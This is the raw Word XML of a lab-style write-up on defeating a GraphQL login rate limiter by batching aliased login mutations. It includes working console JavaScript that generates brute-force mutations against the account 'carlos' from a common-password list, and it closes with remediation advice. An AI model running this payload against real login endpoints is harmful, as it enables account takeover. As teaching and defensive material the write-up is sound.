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98E6" w14:textId="7B39CA99" w:rsidR="00320924" w:rsidRDefault="00042243" w:rsidP="00042243">
      <w:pPr>
        <w:pStyle w:val="Title"/>
      </w:pPr>
      <w:r w:rsidRPr="00042243">
        <w:t>SCENARIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E579336" w14:textId="257210F9" w:rsidR="00042243" w:rsidRPr="00195391" w:rsidRDefault="00D803B9" w:rsidP="00F1247E">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The application contains </w:t>
      </w:r>
      <w:r w:rsidR="0052427D" w:rsidRPr="0052427D">
        <w:t xml:space="preserve">user login mechanism </w:t>
      </w:r>
      <w:r w:rsidR="0052427D">
        <w:t>which</w:t>
      </w:r>
      <w:r w:rsidR="0052427D" w:rsidRPr="0052427D">
        <w:t xml:space="preserve"> is powered by a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0052427D" w:rsidRPr="0052427D">
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0052427D" w:rsidRPr="0052427D">
        <w:t xml:space="preserve"> API</w:t>
      </w:r>
      <w:r w:rsidR="00FD6F06">
        <w:t xml:space="preserve"> which </w:t>
      </w:r>
      <w:r w:rsidR="0052427D" w:rsidRPr="0052427D">
        <w:t>has a rate limiter that returns an error if it receives too many requests from the same origin in a short space of time</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00B13D21">
        <w:t xml:space="preserve"> We will try to exploit this vulnerability and get </w:t>
      </w:r>
      <w:r w:rsidR="00341B0F">
        <w:t xml:space="preserve">unauthorized access to </w:t>
      </w:r>
      <w:r w:rsidR="00271874">
        <w:t>an account</w:t>
      </w:r>
      <w:r w:rsidR="00A41278">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F67393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7E107C" w14:textId="3E22F768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B19F46D" w14:textId="427C0CD4" w:rsidR="00042243" w:rsidRPr="007A7617" w:rsidRDefault="00E75AD2" w:rsidP="00A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</w:t>
      </w:r>
      <w:r w:rsidR="002549C3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">send </w:t>
      </w:r>
      <w:r w:rsidR="00E40052">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>the request to login using some wrong credentials.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3291FF58" w14:textId="30D48343" w:rsidR="007A7617" w:rsidRPr="00FE417D" w:rsidRDefault="0038637B" w:rsidP="00A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Send that request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and try sending some more requests and we see that the rate limiter bans our IP for 1 minute.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BE5AEE1" w14:textId="0F9D6183" w:rsidR="00FE417D" w:rsidRPr="00943890" w:rsidRDefault="00FE417D" w:rsidP="00A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Now we need to craft an exploit to mount a brute force on that endpoint so, we will create a payload using a script </w:t>
      </w:r>
      <w:r w:rsidR="000B0679">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Payload 1</w:t>
      </w:r>
      <w:r w:rsidR="004850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by pasting it into the console of that page</w:t>
      </w:r>
      <w:r w:rsidR="004433EF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7754362C" w14:textId="3798BC37" w:rsidR="00943890" w:rsidRPr="004C2B26" w:rsidRDefault="00B54A0D" w:rsidP="00A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Send the request after pasting the output of Payload Script 1 into the Payload 2.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36948FEF" w14:textId="3F5D7B09" w:rsidR="004C2B26" w:rsidRPr="001A4412" w:rsidRDefault="004C2B26" w:rsidP="00A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see that all the queries returned false except one which returned true.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1315F0D7" w14:textId="72AD3D58" w:rsidR="00A5052C" w:rsidRPr="00DB3BCA" w:rsidRDefault="001A4412" w:rsidP="00DB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Now, check the brute force number of the response that returned true and check the corresponding password value of the target account to log in into his account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207F425D" w14:textId="77777777" w:rsidR="002D7A31" w:rsidRDefault="002D7A31" w:rsidP="00A96441">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="68ED2308" w14:textId="5658432D" w:rsidR="00AE6CFD" w:rsidRPr="00A96441" w:rsidRDefault="00042243" w:rsidP="00A96441">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>PAYLOAD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D62E1E6" w14:textId="77777777" w:rsidR="00262036" w:rsidRPr="00262036" w:rsidRDefault="00262036" w:rsidP="00262036">
      <w:pPr>
        <w:pStyle w:val="BodyText2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00262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>copy(`123456,password,12345678,qwerty,123456789,12345,1234,111111,1234567,dragon,123123,baseball,abc123,football,monkey,letmein,shadow,master,666666,qwertyuiop,123321,mustang,1234567890,michael,654321,superman,1qaz2wsx,7777777,121212,000000,qazwsx,123qwe,killer,trustno1,jordan,jennifer,zxcvbnm,asdfgh,hunter,buster,soccer,harley,batman,andrew,tigger,sunshine,iloveyou,2000,charlie,robert,thomas,hockey,ranger,daniel,starwars,klaster,112233,george,computer,michelle,jessica,pepper,1111,zxcvbn,555555,11111111,131313,freedom,777777,pass,maggie,159753,aaaaaa,ginger,princess,joshua,cheese,amanda,summer,love,ashley,nicole,chelsea,biteme,matthew,access,yankees,987654321,dallas,austin,thunder,taylor,matrix,mobilemail,mom,monitor,monitoring,montana,moon,moscow`.split(',').map((element,index)=&gt;`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558132A8" w14:textId="77777777" w:rsidR="00262036" w:rsidRPr="00262036" w:rsidRDefault="00262036" w:rsidP="00262036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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>bruteforce$index:login</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>(input:{password: "$password", username: "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>"}) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58814BD8" w14:textId="24D051DD" w:rsidR="00262036" w:rsidRPr="00262036" w:rsidRDefault="00262036" w:rsidP="00262036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262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">      token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73477E20" w14:textId="77777777" w:rsidR="00262036" w:rsidRPr="00262036" w:rsidRDefault="00262036" w:rsidP="00262036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262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">        success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BE779B" w14:textId="77777777" w:rsidR="00262036" w:rsidRPr="00262036" w:rsidRDefault="00262036" w:rsidP="00262036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262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26ADF224" w14:textId="5DFF3106" w:rsidR="00C666DB" w:rsidRDefault="00262036" w:rsidP="00262036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262036">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>`.replaceAll('$index',index).replaceAll('$password',element)).join('\n'));console.log("The query has been copied to your clipboard.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49F1FE" w14:textId="51687032" w:rsidR="00943890" w:rsidRPr="00943890" w:rsidRDefault="00943890" w:rsidP="00943890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mutation login($input: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00943890">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>LoginInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00943890">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>!) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED59109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login(input: $input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4229F889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    token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F3079AF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    success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B90736" w14:textId="77777777" w:rsid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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555D6DEE" w14:textId="605CD32F" w:rsidR="00374DA4" w:rsidRPr="00EC6F38" w:rsidRDefault="00374DA4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>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>PASTE HERE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12569E41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ab/>
      </w:r>
      <w:r w:rsidRPr="00943890">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00943890">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00943890">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:tab/>
        <w:t>login(input: $input) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2001CBDA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    token</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF6326C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    success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F95D56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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378E698D" w14:textId="1854E818" w:rsidR="00943890" w:rsidRPr="00D16227" w:rsidRDefault="00943890" w:rsidP="00D16227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}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA960C2" w14:textId="77777777" w:rsidR="008E5772" w:rsidRDefault="008E5772" w:rsidP="00356782">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51A47D26" w14:textId="23A439A2" w:rsidR="008E5772" w:rsidRDefault="00761B26" w:rsidP="00356782">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r w:rsidRPr="008E5772">
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="04BDE855" wp14:editId="6E43D28B">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>right</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>540385</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6645910" cy="1212215"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6985"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="118309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90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772">
        <w:t>PROOF OF CONCEPT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE20BA3" w14:textId="2E61FADD" w:rsidR="00042243" w:rsidRDefault="00042243" w:rsidP="00761B26">
      <w:pPr>
        <w:pStyle w:val="BodyText2"/>
      </w:pPr>
      <w:r>
        <w:br/>
        <w:t>REMEDIATION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="728A670C" w14:textId="77777777" w:rsidR="00885AE6" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Implement Proper Rate Limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> The rate limiting should not solely be based on the origin IP. Consider more robust methods that combine </w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>multiple identifiers (e.g., IP, User-Agent, JWT token, etc.) to make bypassing the rate limiter more difficult.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A024E8" w14:textId="77777777" w:rsidR="00885AE6" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Account Lockout:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement account lockout policies after a certain number of failed login attempts. This will prevent brute-force attacks on specific user accounts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4ACBA" w14:textId="77777777" w:rsidR="00885AE6" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>CAPTCHA:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consider integrating CAPTCHA after a certain number of failed login attempts. This can deter automated brute force attacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72532A3E" w14:textId="77777777" w:rsidR="00885AE6" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use Secure Tokens:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Use tokens like CSRF tokens to ensure requests are coming from legitimate sources. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>GraphQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> mutations can use CSRF tokens to validate requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B888215" w14:textId="77777777" w:rsidR="00885AE6" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Obscure Error Messages:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Do not provide verbose error messages that give away information about the application’s internal workings or that inform the attacker they have been rate-limited. Instead, use generic error messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4588A750" w14:textId="063DEF92" w:rsidR="00B36047" w:rsidRPr="00885AE6" w:rsidRDefault="00885AE6" w:rsidP="00885AE6">
      <w:pPr>
        <w:pStyle w:val="BodyText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885AE6">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Use Adaptive Rate Limiting:</w:t>
      </w:r>
      <w:r w:rsidRPr="00885AE6">
        <w:rPr>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> Implement an adaptive rate limiting strategy where the delay increases exponentially with each failed request.</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00B36047" w:rsidRPr="00885AE6" w:rsidSect="007E7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2C8A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="15E66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B19EE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="1ACA0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B6BB1"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="198C97D0"/>
    <w:lvl w:ilvl="0" w:tplc="7F3CBF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76163">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1740515370">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="43420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D6"/>
    <w:rsid w:val="00042243"/>
    <w:rsid w:val="000A4728"/>
    <w:rsid w:val="000B0679"/>
    <w:rsid w:val="001735DD"/>
    <w:rsid w:val="00195391"/>
    <w:rsid w:val="001A4412"/>
    <w:rsid w:val="001B1EE8"/>
    <w:rsid w:val="001E24B8"/>
    <w:rsid w:val="002549C3"/>
    <w:rsid w:val="00262036"/>
    <w:rsid w:val="00271874"/>
    <w:rsid w:val="002722DC"/>
    <w:rsid w:val="00272379"/>
    <w:rsid w:val="002845D6"/>
    <w:rsid w:val="002A395F"/>
    <w:rsid w:val="002D487C"/>
    <w:rsid w:val="002D7A31"/>
    <w:rsid w:val="00320924"/>
    <w:rsid w:val="00324D99"/>
    <w:rsid w:val="00341B0F"/>
    <w:rsid w:val="00356782"/>
    <w:rsid w:val="003626F7"/>
    <w:rsid w:val="00374DA4"/>
    <w:rsid w:val="00385E16"/>
    <w:rsid w:val="0038637B"/>
    <w:rsid w:val="00424F1D"/>
    <w:rsid w:val="004433EF"/>
    <w:rsid w:val="00447A6E"/>
    <w:rsid w:val="00470B45"/>
    <w:rsid w:val="00483ED5"/>
    <w:rsid w:val="0048505F"/>
    <w:rsid w:val="004C2B26"/>
    <w:rsid w:val="004E0F4F"/>
    <w:rsid w:val="0052427D"/>
    <w:rsid w:val="0053224F"/>
    <w:rsid w:val="00553A61"/>
    <w:rsid w:val="005830AE"/>
    <w:rsid w:val="005A7F7F"/>
    <w:rsid w:val="005B4663"/>
    <w:rsid w:val="005D361E"/>
    <w:rsid w:val="006403ED"/>
    <w:rsid w:val="006C3D41"/>
    <w:rsid w:val="0075661F"/>
    <w:rsid w:val="00761B26"/>
    <w:rsid w:val="007A7617"/>
    <w:rsid w:val="007E7F3E"/>
    <w:rsid w:val="00817BF4"/>
    <w:rsid w:val="00866F30"/>
    <w:rsid w:val="00880CF7"/>
    <w:rsid w:val="00885AE6"/>
    <w:rsid w:val="008E5772"/>
    <w:rsid w:val="008E7339"/>
    <w:rsid w:val="00943890"/>
    <w:rsid w:val="00961AEB"/>
    <w:rsid w:val="00A41160"/>
    <w:rsid w:val="00A41278"/>
    <w:rsid w:val="00A5052C"/>
    <w:rsid w:val="00A873D5"/>
    <w:rsid w:val="00A96441"/>
    <w:rsid w:val="00AE6CFD"/>
    <w:rsid w:val="00B13D21"/>
    <w:rsid w:val="00B15EAE"/>
    <w:rsid w:val="00B322B5"/>
    <w:rsid w:val="00B36047"/>
    <w:rsid w:val="00B43ACF"/>
    <w:rsid w:val="00B54A0D"/>
    <w:rsid w:val="00B91DDC"/>
    <w:rsid w:val="00B97298"/>
    <w:rsid w:val="00BD392F"/>
    <w:rsid w:val="00C01E01"/>
    <w:rsid w:val="00C666DB"/>
    <w:rsid w:val="00D16227"/>
    <w:rsid w:val="00D464A8"/>
    <w:rsid w:val="00D662D3"/>
    <w:rsid w:val="00D803B9"/>
    <w:rsid w:val="00D841C3"/>
    <w:rsid w:val="00DA37E9"/>
    <w:rsid w:val="00DB3BCA"/>
    <w:rsid w:val="00DF0AEF"/>
    <w:rsid w:val="00DF4BA0"/>
    <w:rsid w:val="00E27683"/>
    <w:rsid w:val="00E40052"/>
    <w:rsid w:val="00E75AD2"/>
    <w:rsid w:val="00EC6F38"/>
    <w:rsid w:val="00ED123D"/>
    <w:rsid w:val="00F1247E"/>
    <w:rsid w:val="00FA14FF"/>
    <w:rsid w:val="00FC64EF"/>
    <w:rsid w:val="00FD6F06"/>
    <w:rsid w:val="00FE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FF54"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DF0A631E-800D-4A22-B65B-FEBEF5C7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2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422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247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247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AD2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A96441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BodyText2Char">
    <w:name w:val="Body Text 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="BodyText2"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00A96441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35</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-09-25T12:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-10-09T09:52:00Z</dcterms:modified>
</cp:coreProperties>
</file>